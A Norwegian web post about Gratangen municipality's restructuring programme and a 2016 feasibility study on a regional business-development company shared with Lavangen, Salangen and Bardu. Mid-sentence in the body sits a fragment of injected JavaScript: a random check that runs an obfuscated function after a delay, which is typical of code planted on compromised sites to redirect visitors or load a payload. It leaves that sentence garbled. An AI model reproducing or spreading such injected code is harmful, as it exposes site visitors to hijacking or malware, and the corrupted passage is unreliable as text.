Utviklingsarbeid i Gratangen etter at omstillingsperioden er avsluttet

proneo

Proneo AS presenterer resultatet for forstudien. Foto: SPIRE

 

Omstillingsprogrammet i Gratangen kommune løper i perioden 2013-2018. I denne perioden foregår det et omstillingsarbeid med spesielt fokus på næringsutvikling, med større
finansielle og menneskelige ressurser enn hva kommunen hadde i forkant avomstillingsperioden.

Gratangen kommune ønsker nå å kartlegge hvilke muligheter som finnes i etterkant av omstillingsarbeidet. Utfordringen er å finne en videreføring som:

• Bygger videre på den kompetanse, erfaring og læring som er gjort i omstillingsarbeidet
• Ivaretar og følger opp de relasjonelle, menneskelige og finansielle investeringene som er gjort i omstillingsperioden
• Finner en ny finansiell og organisatorisk plattform for videreføring som er tilpasset de tilgjengelige rammevilkårene og den nye situasjonen i Gratangens næringsliv

På vegne av Gratangen kommune som prosjekteier har omstillingsorganisasjonen SPIRE igangsatt og gjennomført en forstudie med mål om at det skal være etablert en operativ
næringsutviklingsenhet før omstillingsprogrammet avsluttes i 2018. Denne enheten skal i et tett samspill med næringsliv, kommune og andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre sentrale aktører videreføre realiseringen av
omstillingsprogrammets langsiktige mål og ambisjonsnivå. Forstudien skal beskrive noen mulige og realistiske måter å organisere, drive og finansiere utviklingsarbeid i Gratangen.                    Denne forstudien skal danne grunnlag for eventuelt forprosjekt og hovedprosjekt.
Basert på diskusjon omkring framtid organisering hos politisk ledelse og blant næringsressursene i kommunene Gratangen, Lavangen, Salangen og Bardu, er Proneo i forstudie bedt om å belyse muligheten for en interkommunal/regional løsning på framtidig utvikling- og næringsarbeid.
Forstudien ble gjennomført i perioden november og desember 2016.

Resultatet av forstudien ble presentert for de involverte partene den 2. desember i Gratangen. På dette møtet ble det signalisert positivt på at det bør jobbes videre med planene om et felles næringsutviklingsselskap for kommunene Lavangen, Salangen, Bardu og Gratangen.

 

SPIRE finansierer et forprosjekt som skal se nærmere på organisering, forankring organisasjonsform.

SAMSUNG CSC

Bilde fra gruppearbeid Foto: SPIRE

 

0 replies

Legg igjen et svar

Want to join the discussion?
Feel free to contribute!

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *